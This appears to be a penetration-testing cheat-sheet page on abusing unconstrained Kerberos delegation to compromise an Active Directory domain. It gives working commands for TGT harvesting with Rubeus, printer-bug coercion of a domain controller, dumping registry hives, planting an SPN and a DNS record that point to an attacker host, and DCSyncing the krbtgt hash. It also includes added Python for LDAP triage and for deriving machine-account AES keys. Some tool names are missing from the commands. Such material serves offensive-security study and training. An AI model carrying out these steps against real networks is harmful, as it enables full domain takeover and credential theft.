

PowerView3 > Get-DomainComputer -Unconstrained | select dnshostname,samaccountname,useraccountcontrol
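The LDAP filter behind that PowerView query, with an offline triage of its output, as an added Python example (not code from the page or from PowerView). PowerView's -Unconstrained matches only the TRUSTED_FOR_DELEGATION bit, so domain controllers, which carry that bit by design, show up next to real footholds; the second filter clause and the classifier below separate them. The sample rows are constructed in the shape of the select above and are not real directory output.

```python
"""Added example (not from the page or PowerView): the LDAP filter behind
Get-DomainComputer -Unconstrained, plus offline triage of its output so domain
controllers (unconstrained by design) are not mistaken for footholds.
The sample rows are constructed, not real directory output."""

# userAccountControl bits (MS-SAMR 2.2.1.12) relevant to unconstrained delegation triage
TRUSTED_FOR_DELEGATION = 0x80000       # unconstrained delegation
WORKSTATION_TRUST_ACCOUNT = 0x1000     # member server / workstation
SERVER_TRUST_ACCOUNT = 0x2000          # domain controller

LDAP_BIT_AND = "1.2.840.113556.1.4.803"  # LDAP_MATCHING_RULE_BIT_AND


def ldap_filter_unconstrained(exclude_dcs: bool = True) -> str:
    """First clause is what PowerView's -Unconstrained switch uses; DCs always carry
    TRUSTED_FOR_DELEGATION, so the second clause drops them from a foothold search."""
    flt = (f"(&(objectCategory=computer)"
           f"(userAccountControl:{LDAP_BIT_AND}:={TRUSTED_FOR_DELEGATION})")
    if exclude_dcs:
        flt += f"(!(userAccountControl:{LDAP_BIT_AND}:={SERVER_TRUST_ACCOUNT}))"
    return flt + ")"


def classify(uac: int) -> str:
    """Decode the bits that matter for this attack path."""
    if uac & SERVER_TRUST_ACCOUNT:
        return "dc"               # the account you coerce, not the one you need to own
    if uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"    # owning it yields TGTs of principals that authenticate to it
    return "none"


# constructed sample rows; 532480 = 0x82000 (DC), 528384 = 0x81000 (unconstrained member)
SAMPLE = [
    {"dnshostname": "dc01.megacorp.local", "samaccountname": "DC01$", "useraccountcontrol": 532480},
    {"dnshostname": "srv01.megacorp.local", "samaccountname": "SRV01$", "useraccountcontrol": 528384},
    {"dnshostname": "ws01.megacorp.local", "samaccountname": "WS01$", "useraccountcontrol": 4096},
]


def unconstrained_footholds(rows) -> list:
    """dNSHostNames whose computer account is unconstrained and is not a DC."""
    return [r["dnshostname"] for r in rows
            if classify(int(r["useraccountcontrol"])) == "unconstrained"]


if __name__ == "__main__":
    print(ldap_filter_unconstrained())
    for r in SAMPLE:
        print(f'{r["samaccountname"]:8} {r["useraccountcontrol"]:>8} {classify(r["useraccountcontrol"])}')
    print(unconstrained_footholds(SAMPLE))
```

The filter string can be pasted into any LDAP client (ldapsearch, windapsearch) when PowerView is not an option; the classifier is the same check you would apply by eye to the useraccountcontrol column of the PowerView output.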

Monitor for TGTs

Coerce authentication from a DC while harvesting TGTs in the background on the owned unconstrained delegation host (start the monitor first; Rubeus must run elevated to read tickets from other logon sessions):
Cmd > .\Rubeus.exe monitor /targetuser:DC01$ /interval:5 /nowrap /runfor:60 [/registry:SOFTWARE\MONITOR] [/consoleoutfile:C:\Windows\Temp\monitor.txt]
Cmd > .\SpoolSample.exe dc01.megacorp.local srv01.megacorp.local
Use ticket_converter or to convert the TGT from .kirbi to .ccache (usable with impacket):
$ python dc01.kirbi dc01.ccache
$ KRB5CCNAME=`pwd`/dc01.ccache ...
If the output was written to the registry (/registry option), read the harvested ticket from there and then remove the key:
PS > Get-ItemProperty HKLM:\SOFTWARE\MONITOR\[email protected]
PS > Get-Item HKLM:\SOFTWARE\MONITOR\ | Remove-Item -Recurse -Force

"Relaying" Kerberos

From Zero Credential to Full Domain Compromise (Haboob Team).pdf

Printer Bug + DCSync

  • Owned computer account with unconstrained delegation enabled (SRV01).
  • Printer bug on a domain controller (DC01).
  • Permissions to add an SPN for the owned computer account and to create a DNS record in AD. Both are defaults: the account's own validated writes to servicePrincipalName / msDS-AdditionalDnsHostName, and Authenticated Users' right to create records in AD-integrated DNS zones.
1. Grab owned computer account password to calculate its Kerberos AES key. This is done automatically when extracting the password remotely with, or it will be done later by when providing it the password in hex from local output:
# Remotely
$ MEGACORP/snovvcrash:'Passw0rd!'@SRV01.megacorp.local -ts
# Locally
Cmd > reg.exe save hklm\system system.hive
Cmd > reg.exe save hklm\security security.hive
$ -system system.hive -security security.hive LOCAL
2. Add a malicious SPN for the owned computer account with unconstrained delegation:
# Check (no modifications)
$ python -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local -q DC01.megacorp.local
# Adding a servicePrincipalName whose host part does not match the account's dNSHostName or sAMAccountName fails (the computer only holds the Validated-SPN write)
$ python -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local DC01.megacorp.local
# But writing msDS-AdditionalDnsHostName succeeds (Validated-MS-DS-Additional-DNS-Host-Name), and the DC adds the matching HOST/ SPN automatically
$ python -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local DC01.megacorp.local --additional
3. Add a DNS record pointing to the attacker's host:
$ python -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -r evil.megacorp.local -d <ATTACKER_IP> --action add DC01.megacorp.local
4. Check that the record resolves (the DC's DNS service picks up LDAP-added records within roughly 3 minutes):
$ nslookup evil.megacorp.local <DC01_IP>
Name: evil.megacorp.local
5. Start providing either the AES key of the owned computer account or its plaintext password in hex together with its Kerberos salt:
# In case was used remotely
$ sudo python -aesKey 00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff
# In case was used locally
# Computer-account salt = REALM in upper case + "host" + dNSHostName in lower case
$ sudo python --krbhexpass <PLAIN_PASSWORD_HEX> --krbsalt MEGACORP.LOCALhostsrv01.megacorp.local
6. Coerce the authentication to attacker's host from DC01 by triggering printer bug:
$ python megacorp.local/'SRV01$'@DC01.megacorp.local -hashes aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 evil.megacorp.local
7. Export the extracted DC01$ TGT and DCSync the krbtgt hash (or any other privileged account's):
$ export KRB5CCNAME=`pwd`/'[email protected][email protected]'
$ DC01.megacorp.local -dc-ip <DC01_IP> -just-dc-user 'MEGACORP\krbtgt' -k -no-pass
8. Clean up: remove the additional DNS hostname (and with it the auto-generated SPN) and the DNS record:
$ python -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local -r DC01.megacorp.local --additional
$ python -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -r evil.megacorp.local -d <ATTACKER_IP> --action remove DC01.megacorp.local
# Check if the SPN was deleted successfully
$ windapsearch --dc -d megacorp.local -u 'SRV01$' --hash fc525c9683e8fe067095ba2ddc971889 -m computers --attrs servicePrincipalName | grep SRV01
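Steps 1 and 5 above hinge on one derivation: the AES key a tool computes from the machine password, the salt format MEGACORP.LOCALhostsrv01.megacorp.local, and the fact that a local hive dump hands you the password as UTF-16LE hex rather than as a key. The following is an added Python example, not code from the page or from the tools it lists, that performs that RFC 3962 string-to-key derivation offline with the standard library only (AES is implemented inline so the result can be checked without third-party packages). It assumes the computer's dNSHostName is <sAMAccountName without $>.<realm>, as in the page's example; the demo password hex is constructed, not a real dump.

```python
"""Added example, not from the page or the tools it lists: derive the Kerberos AES key of the
owned computer account offline from (a) the plaintext-password hex a local hive dump yields and
(b) the salt format the page shows. Pure stdlib; AES is inlined so the result is checkable."""
import hashlib

# ---- minimal AES, encryption only (FIPS-197); enough for the DK step ------------------------
def _xtime(a):
    a <<= 1
    return (a ^ 0x11B) & 0xFF if a & 0x100 else a

def _gmul(a, b):
    p = 0
    while b:
        if b & 1:
            p ^= a
        a, b = _xtime(a), b >> 1
    return p

def _build_sbox():
    sbox = []
    for x in range(256):
        inv = next((y for y in range(1, 256) if _gmul(x, y) == 1), 0)
        s = inv
        for _ in range(4):                      # affine map: b ^ rotl1(b) ^ ... ^ rotl4(b) ^ 0x63
            inv = ((inv << 1) | (inv >> 7)) & 0xFF
            s ^= inv
        sbox.append(s ^ 0x63)
    return sbox

SBOX = _build_sbox()

def _expand_key(key):
    nk, nr = len(key) // 4, len(key) // 4 + 6
    w = [list(key[4 * i:4 * i + 4]) for i in range(nk)]
    rcon = 1
    for i in range(nk, 4 * (nr + 1)):
        t = w[i - 1]
        if i % nk == 0:                                     # RotWord, SubWord, Rcon
            t = [SBOX[t[1]] ^ rcon, SBOX[t[2]], SBOX[t[3]], SBOX[t[0]]]
            rcon = _xtime(rcon)
        elif nk > 6 and i % nk == 4:                        # extra SubWord for AES-256
            t = [SBOX[b] for b in t]
        w.append([a ^ b for a, b in zip(w[i - nk], t)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(nr + 1)], nr

def aes_encrypt_block(key: bytes, block: bytes) -> bytes:
    rks, nr = _expand_key(key)
    s = [b ^ k for b, k in zip(block, rks[0])]
    for rnd in range(1, nr + 1):
        s = [SBOX[b] for b in s]                                            # SubBytes
        s = [s[4 * ((c + r) % 4) + r] for c in range(4) for r in range(4)]  # ShiftRows
        if rnd != nr:                                                       # MixColumns
            s = [v for c in range(4) for a in [s[4 * c:4 * c + 4]] for v in (
                _gmul(a[0], 2) ^ _gmul(a[1], 3) ^ a[2] ^ a[3],
                a[0] ^ _gmul(a[1], 2) ^ _gmul(a[2], 3) ^ a[3],
                a[0] ^ a[1] ^ _gmul(a[2], 2) ^ _gmul(a[3], 3),
                _gmul(a[0], 3) ^ a[1] ^ a[2] ^ _gmul(a[3], 2))]
        s = [b ^ k for b, k in zip(s, rks[rnd])]                           # AddRoundKey
    return bytes(s)

# ---- RFC 3962 string-to-key ------------------------------------------------------------------
KERBEROS_NFOLD_128 = bytes.fromhex("6b65726265726f737b9b5b2b93132b93")  # n-fold("kerberos"), RFC 3961 A.1

def aes_string_to_key(password: bytes, salt: bytes, key_len: int, iterations: int = 4096) -> bytes:
    """tkey = PBKDF2-HMAC-SHA1(password, salt); key = DK(tkey, "kerberos")."""
    tkey = hashlib.pbkdf2_hmac("sha1", password, salt, iterations, key_len)
    out, block = b"", KERBEROS_NFOLD_128
    while len(out) < key_len:                   # DR: K1 = E(tkey, nfold), K2 = E(tkey, K1), ...
        block = aes_encrypt_block(tkey, block)
        out += block
    return out[:key_len]

def kerberos_salt(realm: str, sam_account_name: str, dns_host_name: str = "") -> str:
    """Default AD salt. Users: REALM + sAMAccountName (case preserved). Computers: REALM +
    "host" + lower-case dNSHostName; assumed here to be <name>.<realm> unless given."""
    realm = realm.upper()
    if not sam_account_name.endswith("$"):
        return realm + sam_account_name
    host = dns_host_name or f"{sam_account_name[:-1]}.{realm}"
    return f"{realm}host{host.lower()}"

def machine_password_bytes(plain_password_hex: str) -> bytes:
    """A hive dump prints the machine password as hex of its UTF-16LE bytes; string-to-key
    operates on the UTF-8 encoding of the same code points (what --krbhexpass handles)."""
    return bytes.fromhex(plain_password_hex).decode("utf-16-le").encode("utf-8")

def machine_aes256_key(realm: str, sam: str, plain_password_hex: str) -> str:
    """The value you would pass as -aesKey instead of --krbhexpass/--krbsalt."""
    return aes_string_to_key(machine_password_bytes(plain_password_hex),
                             kerberos_salt(realm, sam).encode(), 32).hex()

if __name__ == "__main__":
    demo_hex = "Z3qk!Lm9".encode("utf-16-le").hex()      # constructed, not a real machine password
    print(kerberos_salt("MEGACORP.LOCAL", "SRV01$"))
    print(machine_aes256_key("MEGACORP.LOCAL", "SRV01$", demo_hex))
```

Because the key is a pure function of password and salt, the two ways of starting the listener in step 5 (AES key, or hex password plus salt) are interchangeable; if the derived key does not match what a remote dump reported, the salt is the usual culprit: check the account's real dNSHostName and the realm casing before suspecting the password.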
Other scenarios:
  • In this blogpost it is described how to perform the attack by abusing a service (user) account with unconstrained delegation enabled.
  • In this blogpost it is described how to perform the attack from Windows by extracting TGT with Inveigh.